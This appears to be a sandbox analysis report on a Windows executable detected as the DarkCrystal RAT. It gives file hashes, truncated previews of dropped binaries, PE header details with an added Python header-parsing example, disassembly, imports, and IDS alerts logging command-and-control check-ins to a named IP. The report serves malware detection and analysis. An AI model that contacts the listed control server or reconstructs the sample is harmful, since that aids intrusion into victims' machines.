                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....8g............................>.... ........@.. ....................... ............@.....................................K....... ............................................................................ ............... ..H............text...D.... ...................... ..`.rsrc... ...........................@....reloc..............................@..B................ .......H....... ..................]...f........................................0..........(.... ........8........E............9.......8....(.... ....8....*(.... ....~....{....9....& ....8....(.... ....~....{....9....& ....8........0.......... ........8........E........R...F.......{...8........~....(h...~....(l... ....?*... ....~....{f...:....& ....8....r...ps....z*~....:.... ....~....{v...:w...& ....8l...~....(`... .... .... ....s....~....(d....... ....86......... ....~....{f...9..
                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                            File Type:MSVC .res
                                                            Category:dropped
                                                            Size (bytes):1224
                                                            Entropy (8bit):4.435108676655666
                                                            Encrypted:false
                                                            SSDEEP:24:OBxOysuZhN7jSjRzPNnqNdt4+lEbNFjMyi07:COulajfqTSfbNtme
                                                            MD5:931E1E72E561761F8A74F57989D1EA0A
                                                            SHA1:B66268B9D02EC855EB91A5018C43049B4458AB16
                                                            SHA-256:093A39E3AB8A9732806E0DA9133B14BF5C5B9C7403C3169ABDAD7CECFF341A53
                                                            SHA-512:1D05A9BB5FA990F83BE88361D0CAC286AC8B1A2A010DB2D3C5812FB507663F7C09AE4CADE772502011883A549F5B4E18B20ACF3FE5462901B40ABCC248C98770
                                                            Malicious:false
                                                            Preview:.... ...........................|...<...............0...........|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...\.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <securi
                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):4608
                                                            Entropy (8bit):3.936659394390029
                                                            Encrypted:false
                                                            SSDEEP:48:6DrpHPtVM7Jt8Bs3FJsdcV4MKe274p4SvqBHaOulajfqXSfbNtm:QlPMPc+Vx9M4p4SvkEcjRzNt
                                                            MD5:96CC461E99498FB84F90B6D68B20921C
                                                            SHA1:271F71A2D5215A9A2346BAD570533EEF0DF39B6A
                                                            SHA-256:E02F1404346E6AEAE864D2D4D277DFDF24880F8E0C5CC43D93EA31F94A6B2432
                                                            SHA-512:C4E2C959DE25C946F65EBC614FD5D34C9339E87E49C9158BF9DE4ED40D6E618D35D4BF5D7E4638209C37FFDFC7A501016DA9EEB55F8963774A5A595E695EDF45
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....pg.............................'... ...@....@.. ....................................@.................................P'..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......(!..(.............................................................(....*.0..!.......r...pre..p.{....(....(....&..&..*....................0..........ri..p(....&..&..*....................0..K.......s.......}...........s....s....(....~....-........s.........~....s....(....*..(....*.BSJB............v4.0.30319......l.......#~..@.......#Strings....4.......#US.........#GUID....... ...#Blob...........WU........%3................................................................
                                                            Process:C:\Windows\System32\PING.EXE
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):502
                                                            Entropy (8bit):4.613865166769504
                                                            Encrypted:false
                                                            SSDEEP:12:PD5pTcgTcgTcgTcgTcgTcgTcgTcgTcgTLs4oS/AFSkIrxMVlmJHaVzvv:ddUOAokItULVDv
                                                            MD5:AEC417D214D9483175B7278C6EE1F67D
                                                            SHA1:A8A133D7CDEC2264B3D3998172D131CA0400A961
                                                            SHA-256:F3C9837C53A21632A2560AC8E1842C5CA8CDE7D700C4047F7AD2C5B672470AE7
                                                            SHA-512:18EF0D607195769222381210C65D264DF6BC9D7A49C3B334F8987F1F425CBE6277BDC28C0E61FD4A1F2B4CE8A50A0A947F3879579B73B34B55CA58057FC1F4F0
                                                            Malicious:false
                                                            Preview:..Pinging 467601 [::1] with 32 bytes of data:..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ....Ping statistics for ::1:.. Packets: Sent = 10, Received = 10, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 0ms, Maximum = 0ms, Average = 0ms..
                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                            Entropy (8bit):7.385511577553731
                                                            TrID:
                                                            • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                            • Win32 Executable (generic) a (10002005/4) 49.97%
                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                            • DOS Executable Generic (2002/1) 0.01%
                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                            File name:EjS7Q5fFCE.exe
                                                            File size:2'009'852 bytes
                                                            MD5:5fa3d2d795206f9981b7bd191c423d65
                                                            SHA1:e4fb0a0e2c1dc7c1bca06c791ad1ad05a67016ca
                                                            SHA256:0a9c437939c86beb90ce02ac853983c7daca5d801489b81f537d6c9b9c4796b3
                                                            SHA512:949e3575a28fe72e4de9d2ef30250a73f912ffc7cd42bb83e465bf8201453bc26c1dd79ce3adc90b2253a5d2b9fa778dff91ef768d8790c500d20defddc5802e
                                                            SSDEEP:24576:2TbBv5rUyXVCBz/sS1IVH3L88k4BeRFEOVqZ9U6adNhA3rjt4fxF3b5EJb7Tgo0F:IBJu4788WhV89R243rZ4fxR1EJuZJr
                                                            TLSH:3F95AE166AD25E37C26427B18557403D93B4D7323A72EF0B361F24A5AC13BF5CA332A6
                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x_c.<>..<>..<>......1>.......>......$>...I..>>...I../>...I..+>...I...>..5F..7>..5F..;>..<>..)?...I...>...I..=>...I..=>...I..=>.
                                                            Icon Hash:1515d4d4442f2d2d
                                                            Entrypoint:0x41f530
                                                            Entrypoint Section:.text
                                                            Digitally signed:false
                                                            Imagebase:0x400000
                                                            Subsystem:windows gui
                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                            Time Stamp:0x6220BF8D [Thu Mar 3 13:15:57 2022 UTC]
                                                            TLS Callbacks:
                                                            CLR (.Net) Version:
                                                            OS Version Major:5
                                                            OS Version Minor:1
                                                            File Version Major:5
                                                            File Version Minor:1
                                                            Subsystem Version Major:5
                                                            Subsystem Version Minor:1
                                                            Import Hash:12e12319f1029ec4f8fcbed7e82df162
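The static fields above (entrypoint, image base, time stamp, subsystem, file and DLL characteristics, the empty CLR version) are all read straight from the PE headers. The block below is an added example, not Joe Sandbox code or the sample itself: instead of shipping the binary it constructs a minimal PE32 header carrying this report's values (entrypoint 0x41f530, image base 0x400000, time stamp 0x6220BF8D, GUI subsystem, the listed characteristics) and parses it back, so a practitioner can check a dropped file's headers against the report the same way. Field offsets follow the PE/COFF layout for the PE32 optional header; the COM descriptor data directory is used to decide whether an image is managed, which is what an empty `CLR (.Net) Version` reflects.

```python
"""Reading the PE header fields listed in the static section above.

Added example (not Joe Sandbox code). The header is constructed around the
report's values; nothing here is taken from the sample's bytes.
"""
import struct
from datetime import datetime, timezone

FILE_CHARACTERISTICS = {0x0002: "EXECUTABLE_IMAGE", 0x0100: "32BIT_MACHINE", 0x2000: "DLL"}
DLL_CHARACTERISTICS = {
    0x0040: "DYNAMIC_BASE", 0x0100: "NX_COMPAT", 0x0400: "NO_SEH",
    0x4000: "GUARD_CF", 0x8000: "TERMINAL_SERVER_AWARE",
}
SUBSYSTEMS = {2: "windows gui", 3: "windows cui"}
PE32_MAGIC = 0x10B


def flag_names(value: int, table: dict) -> list:
    return [name for bit, name in sorted(table.items()) if value & bit]


def parse_pe32_header(data: bytes) -> dict:
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    machine, nsections, timestamp, _, _, opt_size, chars = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    if struct.unpack_from("<H", data, opt)[0] != PE32_MAGIC:
        raise ValueError("not a PE32 (32-bit) optional header")
    entry_rva = struct.unpack_from("<I", data, opt + 16)[0]
    image_base = struct.unpack_from("<I", data, opt + 28)[0]
    os_major, os_minor = struct.unpack_from("<HH", data, opt + 40)
    subsystem, dll_chars = struct.unpack_from("<HH", data, opt + 68)
    # Data directory 14 (COM descriptor) is non-zero only for managed (.NET) images.
    clr_rva = struct.unpack_from("<I", data, opt + 96 + 14 * 8)[0] if opt_size >= 96 + 15 * 8 else 0
    return {
        "machine": machine,
        "sections": nsections,
        "timestamp_utc": datetime.fromtimestamp(timestamp, tz=timezone.utc).isoformat(),
        "entrypoint": image_base + entry_rva,   # the report prints the VA, not the RVA
        "image_base": image_base,
        "os_version": f"{os_major}.{os_minor}",
        "subsystem": SUBSYSTEMS.get(subsystem, str(subsystem)),
        "file_characteristics": flag_names(chars, FILE_CHARACTERISTICS),
        "dll_characteristics": flag_names(dll_chars, DLL_CHARACTERISTICS),
        "is_dotnet": clr_rva != 0,
    }


def build_pe32_header(entry_rva, image_base, timestamp, subsystem, file_chars, dll_chars) -> bytes:
    """Constructed header: DOS header with e_lfanew, PE signature, COFF header, 224-byte PE32 optional header."""
    e_lfanew = 0x80
    dos = bytearray(e_lfanew)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x14C, 1, timestamp, 0, 0, 224, file_chars)   # 0x14C = i386
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, PE32_MAGIC)
    struct.pack_into("<I", opt, 16, entry_rva)
    struct.pack_into("<I", opt, 28, image_base)
    struct.pack_into("<HH", opt, 40, 5, 1)      # OS version 5.1, as in the report
    struct.pack_into("<HH", opt, 48, 5, 1)      # subsystem version 5.1
    struct.pack_into("<HH", opt, 68, subsystem, dll_chars)
    struct.pack_into("<I", opt, 92, 16)         # NumberOfRvaAndSizes; all directories left zero
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt)


# Values from this report's static section; the bytes around them are constructed.
SAMPLE_HEADER = build_pe32_header(
    entry_rva=0x41F530 - 0x400000, image_base=0x400000, timestamp=0x6220BF8D,
    subsystem=2, file_chars=0x0002 | 0x0100, dll_chars=0x0040 | 0x0100 | 0x4000 | 0x8000,
)

if __name__ == "__main__":
    for key, value in parse_pe32_header(SAMPLE_HEADER).items():
        print(f"{key}: {value}")
```

Run `parse_pe32_header(open(path, "rb").read())` on a real 32-bit dropped file to compare with the report; PE32+ images need the 64-bit optional header offsets and are rejected here on purpose.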
                                                            Instruction
                                                            call 00007FC390878E9Bh
                                                            jmp 00007FC3908787ADh
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            push ebp
                                                            mov ebp, esp
                                                            push esi
                                                            push dword ptr [ebp+08h]
                                                            mov esi, ecx
                                                            call 00007FC39086B5F7h
                                                            mov dword ptr [esi], 004356D0h
                                                            mov eax, esi
                                                            pop esi
                                                            pop ebp
                                                            retn 0004h
                                                            and dword ptr [ecx+04h], 00000000h
                                                            mov eax, ecx
                                                            and dword ptr [ecx+08h], 00000000h
                                                            mov dword ptr [ecx+04h], 004356D8h
                                                            mov dword ptr [ecx], 004356D0h
                                                            ret
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            push ebp
                                                            mov ebp, esp
                                                            push esi
                                                            mov esi, ecx
                                                            lea eax, dword ptr [esi+04h]
                                                            mov dword ptr [esi], 004356B8h
                                                            push eax
                                                            call 00007FC39087BC3Fh
                                                            test byte ptr [ebp+08h], 00000001h
                                                            pop ecx
                                                            je 00007FC39087893Ch
                                                            push 0000000Ch
                                                            push esi
                                                            call 00007FC390877EF9h
                                                            pop ecx
                                                            pop ecx
                                                            mov eax, esi
                                                            pop esi
                                                            pop ebp
                                                            retn 0004h
                                                            push ebp
                                                            mov ebp, esp
                                                            sub esp, 0Ch
                                                            lea ecx, dword ptr [ebp-0Ch]
                                                            call 00007FC39086B572h
                                                            push 0043BEF0h
                                                            lea eax, dword ptr [ebp-0Ch]
                                                            push eax
                                                            call 00007FC39087B6F9h
                                                            int3
                                                            push ebp
                                                            mov ebp, esp
                                                            sub esp, 0Ch
                                                            lea ecx, dword ptr [ebp-0Ch]
                                                            call 00007FC3908788B8h
                                                            push 0043C0F4h
                                                            lea eax, dword ptr [ebp-0Ch]
                                                            push eax
                                                            call 00007FC39087B6DCh
                                                            int3
                                                            jmp 00007FC39087D177h
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            push 00422900h
                                                            push dword ptr fs:[00000000h]
                                                            Programming Language:
                                                            • [ C ] VS2008 SP1 build 30729
                                                            • [IMP] VS2008 SP1 build 30729
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x3d070 | 0x34 | .rdata
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x3d0a4 | 0x50 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x64000 | 0xdff8 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x72000 | 0x233c | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x3b11c | 0x54 | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x355f8 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x33000 | 0x278 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x3c5ec | 0x120 | .rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x31bdc | 0x31c00 | 2831bb8b11e3209658a53131886cdf98 | False | 0.5909380888819096 | data | 6.712962136932442 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x33000 | 0xaec0 | 0xb000 | 042f11346230ca5aa360727d9908e809 | False | 0.4579190340909091 | data | 5.261605615899847 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x3e000 | 0x24720 | 0x1000 | 9670b581969e508258d8bc903025de5e | False | 0.451416015625 | data | 4.387459135575936 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.didat | 0x63000 | 0x190 | 0x200 | c83554035c63bb446c6208d0c8fa0256 | False | 0.4453125 | data | 3.3327310103022305 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x64000 | 0xdff8 | 0xe000 | ba08fbcd0ed7d9e6a268d75148d9914b | False | 0.6373639787946429 | data | 6.638661032196024 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x72000 | 0x233c | 0x2400 | 40b5e17755fd6fdd34de06e5cdb7f711 | False | 0.7749565972222222 | data | 6.623012966548067 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
PNG | 0x64650 | 0xb45 | PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced | English | United States | 1.0027729636048528
PNG | 0x65198 | 0x15a9 | PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced | English | United States | 0.9363390441839495
RT_ICON | 0x66748 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colors | English | United States | 0.47832369942196534
RT_ICON | 0x66cb0 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colors | English | United States | 0.5410649819494585
RT_ICON | 0x67558 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colors | English | United States | 0.4933368869936034
RT_ICON | 0x68400 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/m | English | United States | 0.5390070921985816
RT_ICON | 0x68868 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/m | English | United States | 0.41393058161350843
RT_ICON | 0x69910 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/m | English | United States | 0.3479253112033195
RT_ICON | 0x6beb8 | 0x3d71 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.9809269502193401
RT_DIALOG | 0x70588 | 0x286 | data | English | United States | 0.5092879256965944
RT_DIALOG | 0x70358 | 0x13a | data | English | United States | 0.60828025477707
RT_DIALOG | 0x70498 | 0xec | data | English | United States | 0.6991525423728814
RT_DIALOG | 0x70228 | 0x12e | data | English | United States | 0.5927152317880795
RT_DIALOG | 0x6fef0 | 0x338 | data | English | United States | 0.45145631067961167
RT_DIALOG | 0x6fc98 | 0x252 | data | English | United States | 0.5757575757575758
RT_STRING | 0x70f68 | 0x1e2 | data | English | United States | 0.3900414937759336
RT_STRING | 0x71150 | 0x1cc | data | English | United States | 0.4282608695652174
RT_STRING | 0x71320 | 0x1b8 | data | English | United States | 0.45681818181818185
RT_STRING | 0x714d8 | 0x146 | data | English | United States | 0.5153374233128835
RT_STRING | 0x71620 | 0x46c | data | English | United States | 0.3454063604240283
RT_STRING | 0x71a90 | 0x166 | data | English | United States | 0.49162011173184356
RT_STRING | 0x71bf8 | 0x152 | data | English | United States | 0.5059171597633136
RT_STRING | 0x71d50 | 0x10a | data | English | United States | 0.49624060150375937
RT_STRING | 0x71e60 | 0xbc | data | English | United States | 0.6329787234042553
RT_STRING | 0x71f20 | 0xd6 | data | English | United States | 0.5747663551401869
RT_GROUP_ICON | 0x6fc30 | 0x68 | data | English | United States | 0.7019230769230769
RT_MANIFEST | 0x70810 | 0x753 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.3957333333333333
DLL | Import
KERNEL32.dll | GetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, InterlockedDecrement, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, DecodePointer, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, LocalFree, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage
OLEAUT32.dll | SysAllocString, SysFreeString, VariantClear
gdiplus.dll | GdipAlloc, GdipDisposeImage, GdipCloneImage, GdipCreateBitmapFromStream, GdipCreateBitmapFromStreamICM, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipFree
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-28T23:47:51.521067+0100 | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 192.168.2.4 | 49736 | 172.67.186.200 | 80 | TCP
2024-12-28T23:48:01.271035+0100 | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 192.168.2.4 | 49737 | 172.67.186.200 | 80 | TCP
2024-12-28T23:48:06.317910+0100 | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 192.168.2.4 | 49739 | 172.67.186.200 | 80 | TCP
2024-12-28T23:48:09.817923+0100 | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 192.168.2.4 | 49746 | 172.67.186.200 | 80 | TCP
2024-12-28T23:48:13.771059+0100 | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 192.168.2.4 | 49757 | 172.67.186.200 | 80 | TCP
2024-12-28T23:48:18.317923+0100 | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 192.168.2.4 | 49768 | 172.67.186.200 | 80 | TCP
2024-12-28T23:48:21.474187+0100 | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 192.168.2.4 | 49773 | 172.67.186.200 | 80 | TCP
2024-12-28T23:48:44.661706+0100 | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 192.168.2.4 | 49825 | 172.67.186.200 | 80 | TCP
2024-12-28T23:48:53.021104+0100 | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 192.168.2.4 | 49845 | 172.67.186.200 | 80 | TCP
2024-12-28T23:49:01.349232+0100 | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 192.168.2.4 | 49863 | 172.67.186.200 | 80 | TCP
2024-12-28T23:49:10.364878+0100 | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 192.168.2.4 | 49883 | 172.67.186.200 | 80 | TCP
2024-12-28T23:49:13.583634+0100 | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 192.168.2.4 | 49892 | 172.67.186.200 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 28, 2024 23:47:50.140027046 CET | 49736 | 80 | 192.168.2.4 | 172.67.186.200
Dec 28, 2024 23:47:50.262155056 CET | 80 | 49736 | 172.67.186.200 | 192.168.2.4
Dec 28, 2024 23:47:50.262259007 CET | 49736 | 80 | 192.168.2.4 | 172.67.186.200
Dec 28, 2024 23:47:50.332626104 CET | 49736 | 80 | 192.168.2.4 | 172.67.186.200
Dec 28, 2024 23:47:50.452173948 CET | 80 | 49736 | 172.67.186.200 | 192.168.2.4
Dec 28, 2024 23:47:50.678116083 CET | 49736 | 80 | 192.168.2.4 | 172.67.186.200
Dec 28, 2024 23:47:50.797688961 CET | 80 | 49736 | 172.67.186.200 | 192.168.2.4
Dec 28, 2024 23:47:51.346797943 CET | 80 | 49736 | 172.67.186.200 | 192.168.2.4
Dec 28, 2024 23:47:51.521066904 CET | 49736 | 80 | 192.168.2.4 | 172.67.186.200
Dec 28, 2024 23:47:51.580703020 CET | 80 | 49736 | 172.67.186.200 | 192.168.2.4
Dec 28, 2024 23:47:51.630399942 CET | 49736 | 80 | 192.168.2.4 | 172.67.186.200
Dec 28, 2024 23:47:51.963726997 CET | 49736 | 80 | 192.168.2.4 | 172.67.186.200
Dec 28, 2024 23:47:59.866179943 CET | 49737 | 80 | 192.168.2.4 | 172.67.186.200
Dec 28, 2024 23:47:59.985748053 CET | 80 | 49737 | 172.67.186.200 | 192.168.2.4
Dec 28, 2024 23:47:59.986095905 CET | 49737 | 80 | 192.168.2.4 | 172.67.186.200
Dec 28, 2024 23:47:59.986454964 CET | 49737 | 80 | 192.168.2.4 | 172.67.186.200
Dec 28, 2024 23:48:00.106019974 CET | 80 | 49737 | 172.67.186.200 | 192.168.2.4
Dec 28, 2024 23:48:00.333673954 CET | 49737 | 80 | 192.168.2.4 | 172.67.186.200
Dec 28, 2024 23:48:00.453438044 CET | 80 | 49737 | 172.67.186.200 | 192.168.2.4
Dec 28, 2024 23:48:01.071428061 CET | 80 | 49737 | 172.67.186.200 | 192.168.2.4
Dec 28, 2024 23:48:01.271034956 CET | 49737 | 80 | 192.168.2.4 | 172.67.186.200
Dec 28, 2024 23:48:01.308924913 CET | 80 | 49737 | 172.67.186.200 | 192.168.2.4
Dec 28, 2024 23:48:01.380403996 CET | 49737 | 80 | 192.168.2.4 | 172.67.186.200
Dec 28, 2024 23:48:01.688787937 CET | 49737 | 80 | 192.168.2.4 | 172.67.186.200
Dec 28, 2024 23:48:04.894881964 CET | 49739 | 80 | 192.168.2.4 | 172.67.186.200
Dec 28, 2024 23:48:05.014389038 CET | 80 | 49739 | 172.67.186.200 | 192.168.2.4
Dec 28, 2024 23:48:05.014457941 CET | 49739 | 80 | 192.168.2.4 | 172.67.186.200
Dec 28, 2024 23:48:05.014668941 CET | 49739 | 80 | 192.168.2.4 | 172.67.186.200
Dec 28, 2024 23:48:05.134144068 CET | 80 | 49739 | 172.67.186.200 | 192.168.2.4
Dec 28, 2024 23:48:05.364931107 CET | 49739 | 80 | 192.168.2.4 | 172.67.186.200
Dec 28, 2024 23:48:05.484411001 CET | 80 | 49739 | 172.67.186.200 | 192.168.2.4
Dec 28, 2024 23:48:06.191646099 CET | 80 | 49739 | 172.67.186.200 | 192.168.2.4
Dec 28, 2024 23:48:06.317909956 CET | 49739 | 80 | 192.168.2.4 | 172.67.186.200
Dec 28, 2024 23:48:06.443243027 CET | 80 | 49739 | 172.67.186.200 | 192.168.2.4
Dec 28, 2024 23:48:06.523104906 CET | 49739 | 80 | 192.168.2.4 | 172.67.186.200
Dec 28, 2024 23:48:08.523077011 CET | 49746 | 80 | 192.168.2.4 | 172.67.186.200
Dec 28, 2024 23:48:08.642743111 CET | 80 | 49746 | 172.67.186.200 | 192.168.2.4
Dec 28, 2024 23:48:08.643501043 CET | 49746 | 80 | 192.168.2.4 | 172.67.186.200
